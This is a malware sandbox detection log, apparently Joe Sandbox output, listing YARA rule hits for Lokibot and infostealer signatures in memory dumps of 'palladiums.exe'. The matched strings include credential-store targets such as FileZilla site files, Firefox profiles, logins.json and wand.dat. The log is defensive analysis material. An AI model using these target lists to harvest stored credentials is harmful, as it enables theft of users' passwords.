26.2.palladiums.exe.1540000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
28.2.palladiums.exe.31e0000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
28.2.palladiums.exe.31e0000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
28.2.palladiums.exe.31e0000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
28.2.palladiums.exe.31e0000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
28.2.palladiums.exe.31e0000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
36.2.palladiums.exe.2010000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
36.2.palladiums.exe.2010000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
36.2.palladiums.exe.2010000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
36.2.palladiums.exe.2010000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
36.2.palladiums.exe.2010000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.2.palladiums.exe.e30000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.2.palladiums.exe.e30000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.palladiums.exe.e30000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.palladiums.exe.e30000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
9.2.palladiums.exe.e30000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
9.2.palladiums.exe.e30000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
9.2.palladiums.exe.e30000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.2.palladiums.exe.e30000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
20.2.palladiums.exe.3cf0000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
20.2.palladiums.exe.3cf0000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
20.2.palladiums.exe.3cf0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.palladiums.exe.3cf0000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
20.2.palladiums.exe.3cf0000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
20.2.palladiums.exe.3cf0000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
20.2.palladiums.exe.3cf0000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
20.2.palladiums.exe.3cf0000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
29.2.palladiums.exe.4130000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
29.2.palladiums.exe.4130000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
29.2.palladiums.exe.4130000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
29.2.palladiums.exe.4130000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
29.2.palladiums.exe.4130000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
29.2.palladiums.exe.4130000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
29.2.palladiums.exe.4130000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
29.2.palladiums.exe.4130000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
31.2.palladiums.exe.1a60000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
31.2.palladiums.exe.1a60000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
31.2.palladiums.exe.1a60000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
31.2.palladiums.exe.1a60000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
31.2.palladiums.exe.1a60000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
35.2.palladiums.exe.1340000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
35.2.palladiums.exe.1340000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
35.2.palladiums.exe.1340000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
35.2.palladiums.exe.1340000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
35.2.palladiums.exe.1340000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
35.2.palladiums.exe.1340000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
35.2.palladiums.exe.1340000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
35.2.palladiums.exe.1340000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
25.2.palladiums.exe.11b0000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
25.2.palladiums.exe.11b0000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
25.2.palladiums.exe.11b0000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
25.2.palladiums.exe.11b0000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
25.2.palladiums.exe.11b0000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
21.2.palladiums.exe.3b50000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
21.2.palladiums.exe.3b50000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
21.2.palladiums.exe.3b50000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
21.2.palladiums.exe.3b50000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
21.2.palladiums.exe.3b50000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
4.2.Dhy2kmz.exe.67c0000.10.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
12.2.palladiums.exe.1b30000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
12.2.palladiums.exe.1b30000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
12.2.palladiums.exe.1b30000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.palladiums.exe.1b30000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
12.2.palladiums.exe.1b30000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
12.2.palladiums.exe.1b30000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
12.2.palladiums.exe.1b30000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
12.2.palladiums.exe.1b30000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
24.2.palladiums.exe.3a80000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
24.2.palladiums.exe.3a80000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
24.2.palladiums.exe.3a80000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
24.2.palladiums.exe.3a80000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
24.2.palladiums.exe.3a80000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
24.2.palladiums.exe.3a80000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
24.2.palladiums.exe.3a80000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
24.2.palladiums.exe.3a80000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
30.2.palladiums.exe.38b0000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
30.2.palladiums.exe.38b0000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
30.2.palladiums.exe.38b0000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
30.2.palladiums.exe.38b0000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
30.2.palladiums.exe.38b0000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
18.2.palladiums.exe.f20000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
18.2.palladiums.exe.f20000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
18.2.palladiums.exe.f20000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
18.2.palladiums.exe.f20000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
18.2.palladiums.exe.f20000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
18.2.palladiums.exe.f20000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
18.2.palladiums.exe.f20000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
18.2.palladiums.exe.f20000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
16.2.palladiums.exe.1570000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
16.2.palladiums.exe.1570000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
16.2.palladiums.exe.1570000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.palladiums.exe.1570000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
16.2.palladiums.exe.1570000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
16.2.palladiums.exe.1570000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
16.2.palladiums.exe.1570000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
16.2.palladiums.exe.1570000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
17.2.palladiums.exe.1830000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
17.2.palladiums.exe.1830000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
17.2.palladiums.exe.1830000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.palladiums.exe.1830000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
17.2.palladiums.exe.1830000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
17.2.palladiums.exe.1830000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
17.2.palladiums.exe.1830000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
17.2.palladiums.exe.1830000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
34.2.palladiums.exe.18f0000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
34.2.palladiums.exe.18f0000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
34.2.palladiums.exe.18f0000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
34.2.palladiums.exe.18f0000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
34.2.palladiums.exe.18f0000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
25.2.palladiums.exe.11b0000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
25.2.palladiums.exe.11b0000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
25.2.palladiums.exe.11b0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
25.2.palladiums.exe.11b0000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
25.2.palladiums.exe.11b0000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
25.2.palladiums.exe.11b0000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
25.2.palladiums.exe.11b0000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
25.2.palladiums.exe.11b0000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
23.2.palladiums.exe.1440000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
23.2.palladiums.exe.1440000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
23.2.palladiums.exe.1440000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
23.2.palladiums.exe.1440000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
23.2.palladiums.exe.1440000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
24.2.palladiums.exe.3a80000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
24.2.palladiums.exe.3a80000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
